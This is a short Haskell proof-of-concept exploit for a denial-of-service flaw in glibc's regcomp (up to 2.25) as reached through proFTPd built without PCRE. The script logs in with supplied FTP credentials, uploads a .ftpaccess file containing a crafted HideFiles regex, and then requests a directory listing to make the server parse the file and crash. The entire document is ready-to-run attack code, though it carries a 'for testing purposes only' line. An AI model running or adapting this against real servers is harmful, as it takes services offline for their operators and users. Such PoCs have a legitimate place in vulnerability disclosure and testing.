#!/usr/bin/env stack 
-- stack runghc --resolver lts-7.0 --system-ghc --package ftphs
--
-- Multiple denegation of service in regcomp
-- glibc <= 2.25
--
-- This PoC can disturb proFTPd when compiled without
-- pcre support. It requires a valid user with
-- upload permissions.
--
-- by A. Mista.
--
-- For testing purposes only. Do no harm.

import System.Environment
import System.IO
import Network.FTP.Client
import Control.Exception

handler :: SomeException -> IO ()
handler _ = putStrLn "[+] It's dead, Jim"

main = do
    args <- getArgs
    case args of
        [addr, user, pass] -> do 
            putStrLn "[+] Connecting to the ftp server and login"
            conn <- easyConnectFTP addr
            login conn user (Just pass) Nothing
            putStrLn "[+] Sending the mighty regex"
            putbinary conn ".ftpaccess" "HideFiles \"\\a?{1,32767}\"\n"
            putStrLn "[+] Triggering the server to parse .ftpaccess"
            catch (dir conn Nothing >> putStrLn "[-] Not affected") handler
        _ -> putStrLn "USAGE: ./PoC.hs [ADDRESS] [USER] [PASSWORD]"